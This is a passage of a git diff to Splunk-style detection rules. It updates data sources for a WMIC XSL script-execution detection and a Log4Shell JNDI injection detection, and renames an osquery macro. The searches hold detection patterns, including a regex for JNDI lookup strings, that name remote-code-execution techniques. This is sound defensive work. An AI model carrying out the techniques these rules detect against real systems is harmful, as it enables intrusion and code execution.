   If confirmed malicious, this could lead to unauthorized code execution and potential
   system compromise.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
   AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id
   Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name
diff --git a/detections/endpoint/xsl_script_execution_with_wmic.yml b/detections/endpoint/xsl_script_execution_with_wmic.yml
index 87c4f9bd36..b06116aa92 100644
--- a/detections/endpoint/xsl_script_execution_with_wmic.yml
+++ b/detections/endpoint/xsl_script_execution_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of an XSL script using
   the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process
   = "*os get*" Processes.process="*/format:*" Processes.process = "*.xsl*" by Processes.parent_process_name
diff --git a/detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml b/detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml
index a67f0cc60f..765298db54 100644
--- a/detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml
+++ b/detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml
@@ -13,8 +13,7 @@ description: The following analytic detects Log4Shell JNDI payload injections vi
   in Java web applications using log4j, potentially leading to remote code execution.
   If confirmed malicious, attackers could gain unauthorized access, execute arbitrary
   code, and compromise sensitive data within the affected environment.
-data_source:
-- Splunk Stream IP
+data_source: []
 search: '| from datamodel Web.Web | rex field=_raw max_match=0 "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<affected_host>[a-zA-Z0-9\.\-\_\$]+)"
   | join affected_host type=inner [| tstats `security_content_summariesonly` count
   min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic
diff --git a/macros/osquery.yml b/macros/osquery_macro.yml
similarity index 91%
rename from macros/osquery.yml
rename to macros/osquery_macro.yml
index 93de155245..32473363ff 100644
--- a/macros/osquery.yml
+++ b/macros/osquery_macro.yml
@@ -1,4 +1,4 @@
 definition: sourcetype=osquery:results
 description: customer specific splunk configurations(eg- index, source, sourcetype).
   Replace the macro definition with configurations for your Splunk Environmnent.
-name: osquery
\ No newline at end of file
+name: osquery_macro
\ No newline at end of file